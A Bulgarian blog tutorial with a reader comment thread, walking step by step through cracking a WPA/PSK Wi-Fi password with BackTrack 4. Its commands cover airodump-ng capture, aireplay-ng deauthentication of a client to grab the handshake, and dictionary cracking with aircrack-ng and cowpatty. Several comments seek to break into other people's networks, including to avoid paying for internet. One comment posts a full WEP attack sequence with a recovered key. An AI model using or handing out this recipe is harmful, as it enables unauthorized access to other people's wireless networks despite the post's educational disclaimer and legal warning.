Разбиване на Wireless с WPA encoding

Здравейте отново с мен Мартин Петров. Предния път ви демонстрирах как се разбива Wireless с WEP, а сега ще ви обясня как се разбива Wireless с WPA/PSK.

За целта ще използваме live дистрибуцията BackTrack 4 и приложенията в нея .

След като сме заредили нашият BackTrack ще отворим терминал за да подготвим нашият мрежови интерфейс за работа в режим мониторинг

# iwconfig wlan0 mode monitoring

След като настроихме мрежовият ни интерфейс сега ще сканираме за wireless мрежа която да компрометираме с учебна цел

# airodump-ng wlan0

Понеже търсим wireless със WPA кодиране,а тук виждаме такъв прекратяваме с Контрол и C. Wireless мрежата която ще използваме ще бъде "mpetrov_net" на шести канал.

След като избрахме коя мрежа да използваме и видяхме, че тя работи на шести канал е време да пуснем в Терминал 2 airodump за да събирем информация за съответната мрежа.

# airodump-ng -w wpa -c 6 --bssid 00:23:CD:D7:84:FC wlan0

Сега ще отворим Терминал 3 за да изпратим пакети за ре- оторизация. Ще трябва да използваме MAC адреса на клиента които можем да вземем от Терминал 1.

# aireplay-ng -0 1 -a 00:23:CD:D7:84:FC -c 00:1A:73:87:B4:E9 wlan0

След това ще погледнем Терминал 2 и ще видим горе в дясно WPA handshake: 00:23:CD:D7:84:FC с което приключваме събирането на пакети и пристъпваме към кракване на паролата.

За кракване на паролата ще използваме два метода единият е, чрез aircrack, а другият , чрез cowpatty

Първо ще реализираме кракване с aircrack

cd /pentest/wireless/aircrack-g/test
aircrack-ng -w password.lst /root/wpa-01.cap

Сега ще направим кракване с cowpatty:

cd /pentest/wireless/cowpatty
./cowpatty -r /root/wpa-01.cap -f dict -s mpetrov_net

И двата метода успяват да кракнат паролата и да я изведат.

Видео демонстрация от youtube.com: Разбиване на Wireless с WPA encoding (youtube)
Видео демонстрация от vbox7.com:
Разбиване на Wireless с WPA encoding (vbox7)
Надявам се, че този видео материал ще бъде използван и интерпретиран единствено с учебна цел.

До скоро от mpetrov.net

PS: Това е истината-> EPRB

Според нашия Наказателен Кодекс манипулирането на wireless мрежи е незаконно:

Чл. 212а. (Нов -- ДВ, бр. 92 от 2002 г.) (1) (Изм. -- ДВ, бр. 38 от 2007 г.) Който с цел да набави за себе си или за другиго облага възбуди или поддържа заблуждение у някого, като внесе, измени, изтрие или заличи компютърни данни или използва чужд електронен подпис и с това причини на него или на другиго вреда, се наказва за компютърна измама с лишаване от свобода от една до шест години и глоба до шест хиляди лева.
(2) (Изм. -- ДВ, бр. 38 от 2007 г.) Същото наказание се налага и на този, който, без да има право, внесе, измени, изтрие или заличи компютърни данни, за да получи нещо, което не му се следва.

Вместо да правите такива гимнастики проосто си платете интернета и ще го имате винаги.

VN:F [1.9.22_1171]
Rating: 5.0/5 (5 votes cast)
VN:F [1.9.22_1171]
Rating: +3 (from 3 votes)
Разбиване на Wireless с WPA encoding, 5.0 out of 5 based on 5 ratings

241 thoughts on “Разбиване на Wireless с WPA encoding”

  1. @ttt_mtd
    Няма да стане?! :) Ще стане!
    А ти първо се научи да си превключваш линукса за да пишеш на български. после давай съвети.

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  2. abe izkam da vi pitam s toq blacktrack 4 znachi trqbva da go zapisha na cd i sled tova da go boot-na? i sled tova da izvarsha vsichkite tezi neshta koito sa opisani………??ta tazi programa kato q imate kadeto razbiva wpn zashto neq kachite nqkade?

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  3. vsi4ko e taka kakto go opisvate.v gyrciq si kupih originalen taivanski disk s bt3 i bt4.raboti perfektno metoda.koito se interesuva da pi6e na email [email protected]

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  4. Може ли помоля за помощ. Справям се със всичко и в момента в който трябва да ми изскочи паролата ми казва че не я намира в Dictionary-то. От скоро се занимавам с тези неща и поне до колкото разбирам за да разбере паролата трябва да я има или прочете от нещо като библиотека? А от къде мога да си набавя пълна библиотека и дали може някой да ми я прати? Благодаря предварително :)

    П.С. Пращайте на [email protected]

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  5. Той метода си работи… ама за да отгатнеш парола от над 8 символа си е почти невъзможно -- ако се има в предвид че в паролата има малки букви , големи букви, числа и други специални символи

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  6. Здравейте приятели сичко е точно много добър урк :)
    искам да ви попитам свалих си един речник за бацктрацк които е около 5 гб. някои от вас може ли да ми каже този речник къде трябва да го поставя и с каква команда се зарежда благодаря ви предварително :)

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  7. za6to aircrack-ng nakraq mi dava no file or directory i do tam ne namira koda trqbva li da nastroq ne6to.tova go pravq s backtrack 4 r2 instaliran

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  8. Abe, ne vijdate li che tova ne e za vas,aide shte haknete s pomoshta na choveka i ste do tam!!! Pyrvo vzemete nauchete neshto, primerno ustroistvoto i nachina na rabota na internet i togava shte vidite kolko e slojno i ne e za vas. Tova se uchi ot malyk (osobeno za da hakvash), tuk, koito e nad 15 godini e gluak!!!

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  9. Znam, kakva shte e reakciqta na gorniq mi post, no tova samo potvyrjdava moite dumi!!!

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  10. Не знам вече за кой път пиша тук за малко помощ и никoй не ми отговаря.Проблем е там че не знам как да заредя речник в backtrack 4 самата операционна система е зареждам 4рес VMware Workstation
    Моля някой да ми обесни не виждам нищо сложно от това да на пишете 1-2 реда и да помогнете на някого

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  11. КоКооО и аз това чакам пич….свалям речници,но незнам как да ги предложа на Бака….четах някъде че трябвало да си Маунтнеш директорията на харда дето ти се намират речниците,пробвах обаче нестава

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  12. Здравейте, може ли да ми кажете от къде мога да си сваля речници …???

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  13. Имам нчкакъш проблем. Когато използвам aircrack не ми излиза password ами passphrase, а когато използвам cowpatty пак някакъв error ми дава.

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  14. Здравей, бих искала да те помоля за малко помощ. Намирам се в Кипър и тук нещата с интернета са повече от сложни…Ако не искам да платя много сериозна сума за инсталация на тел и интернет, трябва да успея да се справя с backtrack:) Не съм се занимавала с такива неща, но инструкциите ти са повече от изчерпателни и много полезни, благодаря за което:) Аз съм с Windows, справих се с бутващия диск, стигнах до момента с "iwconfig wlan…monitoring" и ми излиза грешката -- "error for wireless request 8B06 -- device or resource busy"….и сега не ми е ясно…някакви идеи? Антената ми е Алфа realtek 8187…

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  15. abe ostavete go toq rabiva negovite si paroli daite mu druga da go vidim,darvodelez

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  16. Zdrasti Valeria, az sam v Agia Napa i ako iskash moga da ti dam programka koiato razbiva WEP(CYTA4H7F73). Za Kipar e perfektna. Pishi mi na poshtata za da ti ya dam.

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  17. как става ръчно вдигане на мрежовите интерфейси за backtrack 4?????????

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  18. http://www.aircrack-ng.org/doku.php?id=wpa_migration_mode
    http://www.backtrack-linux.org/
    прочетете 1та статия свалете backtrack-5
    пробвайте
    успех на 50%
    не ползвате речници за разкодиране
    трябва ви по голяма флаш памет от порядъка на 16гб
    инсталираите на флаш
    използвайте тази програамка за инсталиране на флаш universal-usb-installer
    свалете от тук
    http://universal-usb-installer.en.malavida.com/

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  19. abe hora zastose se mesite sas back track ima po dobra programa ot back track deto razbiva sicki klucove ako iska nyakoy dame pita nesto za programata da se obarne kam moyat imeil [email protected]

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  20. cowpatty и aircrack Искам да ви попитам тва някви програми ли са който трябва да се инсталират или са си вградено в линукса?

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  21. Здравейте, днеска цял ден съм гледал уроци в youtube и накрая я подкарах с VMware, инсталирах я и оправих всичко, НО като напиша # iwconfig wlan0 mode monitoring и ми изписва "No such device".
    Пробвах с airmon-ng да открия ама не дава нищо и незнам какво да направя.
    Ето го лаптопчето на което тествам http://ardes.bg/laptop/ASUS+K52JB-SX137--32221
    Погнете ми ако може! :)
    Моля отговаряйте на [email protected] тъй като няма да следя темата :)

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  22. О да и забравих да спомена, че бачкам на BT 5!!! Но това едва ли е от голямо значение…

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  23. Ne mi se zanimava da pi[a, zatova potyrsete me na skype peio_peev2 . Izvinqvam se za latinicata, no v momenta sym ot backtrack 4 r2 . 6te pomogna s kakvoto moga.

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  24. I ne se zanimawaite s virtualni ma6ini. Predpolagam,4e nikoi ne e stisna za 4 gb. fla6ka.

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  25. Абе да попитам слагам тоа тап БАКТРАК 5 на флаша сас унеботин пускам го от биоса илиза ми някфи прозорчета там стеалтх моде и тем подобни пуснах го на дефаулт трагна да зарежда и излязаха някфи команди кфо стана и накрая един черен прозорец и до там … е кфо е това пуснах го кам 10 пати един от тези пати ми излези като руна на линдолс такава програмка сас 10 команди са спиране ребоот и някфи подобни ае некои който разбира да ми помогне че от 6 дена я мача тая програмка . Пробвах и друг вариант сас вмл лоркстатион обаче неми чете лифи картата аз сам сас нотебок .
    Благодаря предварително ! :–)

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  26. dvd cd njama da ti stigne

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  27. rumene dvd cd njama da go pobere ako iska6 na cd probvai wifiway tam njama tolkova pisane iso fail zapisva se s image burn tva e

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  28. здравеите! имам един проблем. със вин 7 съм. пускам програмата през даимън туулс и не мога да я отвора (отварям я но не знам как да я пусна). моля някои да ми помогне. мерси предварително!

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  29. здравейте някой да е разкодирал парола с бт 5 аз я разкодирах обаче за нищо не става паролата само някакви цифри и толкова ето KEY FOUND! [ 5A:34:30:34:41:30:33:37:46:33:44:33:33 ] (ASCII: Z404A037F3D33 )
    Decrypted correctly: 100%
    ето ги командите за бт5
    airmon-ng
    airmon-ng start wlan0 1ви терминал
    airodump-ng mon0
    airodump-ng -c 1 -b XX:XX:XX:XX -w dnsandavideos mon0
    aireplay-ng -1 0 -a XX:XX:XX:XX mon0 2ри терминал
    aireplay-ng -3 -b XX:XX:XX:XX mon0 3ти терминал
    aireplay-ng -0 0 -a XX:XX:XX:XX mon0(Special Attack) 4ти терминал
    aircrack-ng dnsandavideos-01.cap

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  30. sled kato polzva6 virtyalna mashina probvai purvo da gi zavle4e6 vuv ma6inata i sled tova kogato ti potursi re4nika prosto go provla4i i samo 6te si izpi6e direktoriata probvai moJe i da stane .
    @KoKooO

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  31. sled kato si blytnal njakude trjbva da ti poiska startirane , i tam 6te napi6e6 startx za da trugne no iz4akai malko se zabavj no 6te trugne
    e ako vsi4ko ti e nared @aTishev

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  32. znai purvo probvai sis kradkij kod ako ne se vurJe togava vkarai dulgij kod no bez to4kite i 6te se vurJe ako vsi4ko e nared
    @serto

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  33. здравейте, мога ли по някакъв начин да се сложи wordlist на live cd

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  34. @KoKooO
    Зареждаш го като го "влачиш" от съответната му директория,на която си го свалил и го пуснеш в терминала…

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  35. gdatcov :
    abe hora zastose se mesite sas back track ima po dobra programa ot back track deto razbiva sicki klucove ako iska nyakoy dame pita nesto za programata da se obarne kam moyat imeil [email protected]

    Малииииии,мнооого неграмотно,братле!Сори,ама Back Track-а програма ли е за теб?Тва си е цяла операционна система!А като си имаш "Програмчици" за хакване на WI-FI обясни какво търсиш тук?Моля те,не пиши глупости и не занимавай хората с такива неща!

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: +1 (from 1 vote)
  36. @gudko
    Той не се лага на Live CD,а на компа(примерно на D),после като заредиш live Cd с Back Track ще го намериш на същото място в харда,където си го свалил!

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  37. serto :
    здравейте някой да е разкодирал парола с бт 5 аз я разкодирах ето KEY FOUND! [ 5A:34:30:34:41:30:33:37:46:33:44:33:33 ] (ASCII: Z404A037F3D33 )
    Decrypted correctly: 100%
    ето ги командите за бт5
    airmon-ng
    airmon-ng start wlan0 1ви терминал
    airodump-ng mon0
    airodump-ng -c 1 -b XX:XX:XX:XX -w dnsandavideos mon0
    aireplay-ng -1 0 -a XX:XX:XX:XX mon0 2ри терминал
    aireplay-ng -3 -b XX:XX:XX:XX mon0 3ти терминал
    aireplay-ng -0 0 -a XX:XX:XX:XX mon0(Special Attack) 4ти терминал
    aircrack-ng dnsandavideos-01.cap

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  38. serto :

    serto :
    здравейте някой да е разкодирал парола с бт 5 аз я разкодирах ето KEY FOUND! [ 5A:34:30:34:41:30:33:37:46:33:44:33:33 ] (ASCII: Z404A037F3D33 )
    Decrypted correctly: 100%
    ето ги командите за бт5
    airmon-ng
    airmon-ng start wlan0 1ви терминал
    airodump-ng mon0
    airodump-ng -c 1 -b XX:XX:XX:XX -w dnsandavideos mon0
    aireplay-ng -1 0 -a XX:XX:XX:XX mon0 2ри терминал
    aireplay-ng -3 -b XX:XX:XX:XX mon0 3ти терминал
    aireplay-ng -0 0 -a XX:XX:XX:XX mon0(Special Attack) 4ти терминал
    aircrack-ng dnsandavideos-01.cap

    Това за всяка Wpa ли действа ? Отговори ми, моля те имам още въпроси

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  39. Sled # airodump-ng wlan0 kolkoto i da skanira ne namira ni6to.Ako nqkoi moje da mi pomogne ?!!

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  40. Zdraveite.Imam malak problem i neznam kak dago resha.Probvam da razbiq edni wifi tuk obache se okaza mai che wifi adaptera na laptopa ne podarja airackraking :X kartata mi e Broadcom bcm4310. tarsih na vsqkade po forumi i kakvoli oshte no bez ospeh ako nqkoi moje da mi pomogne shte sam mnogo blagodaren.Broadcom 802.11g.

    Skype:superlubooo

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  41. Zdraveite! Az iskam da popitam nali moje router, koito raboti v clientski rejim da moje da se nastroi za da raboti kato WIFI karta i veche ot tam mi e qsno s BACKTRAKCA rutera mi e s ferm DD-WRT. Blagodarq predvaritelno

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  42. Got no data packets from target network ! -- dava mi tozi shiban natpis nqkoi ako moje da mi pomogne. Blagodarq predvaritelno.

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  43. Стигам до стъпката на която трябва да се покаже WPA handshake …………Но не се показва.Малко помощ?Благодаря предварително

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  44. Marto ako moje prati tvoita password.lst koyto polzva6 za6toto moita yvno e nepalna i ne moje da nameri parolata

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  45. Здравейте, разгледах филмчето и наистина мисля че е полезно с образователна цел. Малка забележка -- би било полезно да се обяни ЗАЩО се полват различни терминали, а не се пише в един и същи (т. е. че действието в конзола 1 трябва да продължава, докато се изпълнява командата в конзола 2 и т.н.). Конкретният ми въпрос е: с какъв софтуер е заснет екрана, т. е. как е направено филмчето? Благодаря предварително!

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  46. nqkoy shte mi razkodira li kod ? :D

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  47. който се интересува от WPA2 да пише
    skype: free.wifi

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)

Вашият коментар

Вашият email адрес няма да бъде публикуван Задължителните полета са отбелязани с *